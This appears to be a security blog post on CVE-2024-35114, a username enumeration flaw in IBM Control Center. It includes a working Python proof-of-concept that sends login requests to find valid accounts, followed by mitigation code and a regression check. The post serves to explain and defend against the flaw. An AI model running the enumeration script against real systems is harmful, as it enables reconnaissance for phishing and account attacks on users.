CVE-2024-35114 - IBM Control Center Username Enumeration Exploit – Full Breakdown
A new security vulnerability has been catalogued as CVE-2024-35114, affecting IBM Control Center versions 6.2.1 and 6.3.1. This issue allows remote attackers to enumerate valid usernames by observing differences in server responses during login attempts. Even though it might sound simple, username enumeration is a classic first step in many cyber-attacks. This post explains the issue, shows how it works with example code, provides reference links, and walks through a practical exploit demonstration.
What Is CVE-2024-35114?
In summary, when a user submits a login request to IBM Control Center, the application responds differently depending on whether the username exists in the system. This makes it possible for an attacker to “guess” which usernames are valid, one by one, by watching for response changes.
IBM’s Official Advisory:
https://www.ibm.com/support/pages/node/715087
A confirmed list of valid usernames lets an attacker:
- Target specific users for phishing or social engineering
This is a key step for attackers to gain access or move on to more advanced techniques.
Let’s say the login form sends a POST request like this:
```http
POST /ibmc/console/api/auth/login HTTP/1.1
Content-Type: application/json

{
  "username": "jdoe",
  "password": "wrongpassword"
}
```
The Flaw
The error message returned by the server differs depending on whether the username exists or only the password is wrong.
That’s all an attacker needs.
Proof of Concept (PoC) Enumeration Script
Below is a simple Python script using requests that tries a list of usernames and prints which ones exist on the server.
```python
import requests
import json

# IBM Control Center login URL (placeholder host)
url = "https://ibmcontrolcenter.example.com/ibmc/console/api/auth/login"

# List of usernames to test
usernames = ["admin", "jdoe", "testuser", "jsmith"]
headers = {"Content-Type": "application/json"}

for username in usernames:
    data = {
        "username": username,
        "password": "WrongPassword123"  # Intentionally wrong
    }
    response = requests.post(url, data=json.dumps(data), headers=headers, verify=False)

    # The two failure messages differ, which is the whole flaw
    if "Incorrect password" in response.text:
        print(f"[+] Username FOUND: {username}")
    elif "User does not exist" in response.text:
        print(f"[-] Username not found: {username}")
    else:
        print(f"[?] Unknown response for {username}: {response.text}")
```
> *Warning*: This is for educational use only! Don’t attack any system you don’t own or have permission to test.
Real Exploit Scenario
Suppose an attacker wants to get a list of real users before attempting further exploits. By simply running the script above with a large list of common names or emails, they can discover usernames without triggering typical security alarms, since each attempt looks like an ordinary failed login.
Fixes & Mitigation
The recommended approach is to standardize error messages. Always return a generic message such as:
```json
{"error":"Invalid username or password"}
```
And never indicate whether the username or the password was wrong.
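To illustrate the fix, here is an added Python example (not IBM’s code; the user store, the hashing scheme and the status codes are constructed for the demo) that puts the leaky response shape next to the hardened one and adds a small regression check that the two failure responses are identical:

```python
import hashlib
import hmac
import json
import os

# Constructed demo user store: username -> (salt, PBKDF2-SHA256 hash).
def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

_SALT = os.urandom(16)
USERS = {"jdoe": (_SALT, _hash("correct horse battery staple", _SALT))}

# Dummy credential used when the username is unknown, so the unknown-user path
# does the same hashing work as the wrong-password path (no timing tell either).
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = _hash("dummy-never-matches", _DUMMY_SALT)

GENERIC_FAILURE = (401, {"error": "Invalid username or password"})


def login_leaky(username: str, password: str):
    """Vulnerable shape: distinct messages reveal whether the account exists."""
    record = USERS.get(username)
    if record is None:
        return 404, {"error": "User does not exist"}
    salt, stored = record
    if not hmac.compare_digest(_hash(password, salt), stored):
        return 401, {"error": "Incorrect password"}
    return 200, {"ok": True}


def login_hardened(username: str, password: str):
    """Fixed shape: every failure returns the identical status and body."""
    record = USERS.get(username)
    salt, stored = record if record is not None else (_DUMMY_SALT, _DUMMY_HASH)
    # Always hash and compare in constant time; only then decide on the outcome.
    password_ok = hmac.compare_digest(_hash(password, salt), stored)
    if record is None or not password_ok:
        return GENERIC_FAILURE
    return 200, {"ok": True}


def failures_indistinguishable(login_fn) -> bool:
    """Regression check: unknown-user and wrong-password responses must be identical."""
    a = login_fn("jdoe", "WrongPassword123")         # real user, bad password
    b = login_fn("nobody-here", "WrongPassword123")  # unknown user
    return a[0] == b[0] and json.dumps(a[1], sort_keys=True) == json.dumps(b[1], sort_keys=True)
```

The check is the kind of assertion worth keeping in an authentication test suite, since it fails the moment someone reintroduces a user-specific error message.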
IBM’s patch for this flaw is available here:
https://www.ibm.com/support/pages/node/715087
Make sure to update to the latest fixed version.
References
- IBM Security Bulletin: IBM Control Center vulnerability CVE-2024-35114
- NIST NVD Entry for CVE-2024-35114
- OWASP: Authentication Error Messages
Conclusion
CVE-2024-35114 is a clear example of how small oversights can expose entire platforms to risk. Even if it doesn’t allow direct access, username enumeration is a dangerous first step for attackers. Check your IBM Control Center, apply patches, and remember: never let your applications show their cards at the login gate.
Timeline
Published on: 01/25/2025 14:15:29 UTC